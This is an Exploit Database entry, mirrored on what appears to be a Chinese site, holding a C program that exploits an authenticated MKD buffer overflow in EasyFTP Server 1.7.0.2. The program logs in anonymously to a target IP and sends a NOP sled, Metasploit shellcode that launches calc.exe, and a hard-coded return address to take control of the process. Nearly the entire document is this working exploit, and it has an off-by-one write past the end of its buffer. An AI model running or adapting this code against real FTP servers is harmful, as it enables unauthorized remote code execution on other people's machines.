EasyFTP Server 1.7.0.2 – ‘MKD’ (Authenticated) Remote Buffer Overflow

• Exploit Database
• 104 阅读

• 作者： x90c
  日期： 2010-04-04
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12044/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155

  #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h>   //************************************************************************* // Easy~Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit // ( 11470_x90c.c ) // // Date: 24/03/2010 // Author: x90c < x90c.org > // // Discovered by: loneferret // // Exploits by: //[1] 11470.py (PoC) - loneferret ( Found: 13/02/2010 ) //- http://www.exploit-db.com/exploits/11470 //[2] 11470_x90c.c ( Exploit ) //( MAGIC RET, Metasploit shellcode ) //*************************************************************************     // Metasploit shellcode ( calc.exe ) - 228 Bytes static char shellcode[] = { "\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93" "\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f" "\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04" "\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb" "\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e" "\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6" "\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21" "\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11" "\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a" "\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5" "\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21" "\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69" "\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36" "\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5" "\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b" "\x1b\x35\x1d" };   int main(int argc, char *argv[]) { int sockfd; struct sockaddr_in sa; char rbuf[128]; char x0x[278]; int i = 0, j = 0; int port = 0; int err = 0;   printf("\n\n***********************************************\n"); printf("*Easy FTP Server 1.7.0.2 MKD Remote BoF *\n"); printf("*Found by: loneferret *\n"); printf("*- http://www.exploit-db.com/exploits/11470 *\n"); printf("*- 11470_x90c.c - x90c*\n"); printf("***************************************************\n\n");   if( argc < 3 ) { printf("Usage: %s <Target IP> <Port>\n\n", argv[0]); exit(1); }   port = atoi(argv[2]);   if(port <= 0 || port > 65535) { port = 21; }   printf("[PORT] %d/tcp\n", port);   memset(&sa, 0, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_addr.s_addr = inet_addr(argv[1]); sa.sin_port = htons(port);   if((sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { err = -1; fprintf(stderr, "[!] Socket failed\n"); goto out; }   // Socket Connect if(connect(sockfd, (struct sockaddr *)&sa, sizeof(struct sockaddr)) == -1) { err = -2; fprintf(stderr, "[!] Connection failed!\n"); goto out; }   printf("[+] Connected!\n");   // Auth recv(sockfd, rbuf, sizeof(rbuf), 0);   send(sockfd, "USER anonymous\r\n", 16, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if(strstr(rbuf, "okay") != NULL) printf("[USER] anonymous\n");   send(sockfd, "PASS anonymous\r\n", 16, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if(strstr(rbuf, "logged in.") != NULL) printf("[PASS] anonymous\n");   // Fill Payload memset(&x0x, 0x90, sizeof(x0x));   for(i = 20, j = 0; j < strlen(shellcode); j++) x0x[i++] = shellcode[j];   x0x[0] = &apos;M&apos;; x0x[1] = &apos;K&apos;; x0x[2] = &apos;D&apos;; x0x[3] = &apos; &apos;;   // MAGIC RET: // # CALL EBP ( EBP Register points to nopsled of this payload when overflowed ) // # 004041EC FFD5 |CALL EBP // # // x0x[272] = &apos;\xEC&apos;; x0x[273] = &apos;\x41&apos;; x0x[274] = &apos;\x40&apos;; x0x[275] = &apos;\x00&apos;;   x0x[276] = &apos;\r&apos;; x0x[277] = &apos;\n&apos;; x0x[278] = &apos;\x00&apos;;   printf("[+] Sending payload...\n");   // Send payload send(sockfd, x0x, 278, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if((strstr(rbuf, "denied.") != NULL) || (strstr(rbuf, "too long") != NULL)) { printf("[!] anonymous account doesn&apos;t have permission to MKD command...\n"); printf("[!] Exploit Failed. ;-x\n"); goto out; }   printf("[+] Exploited :-)\n");   out: close(sockfd); return err; }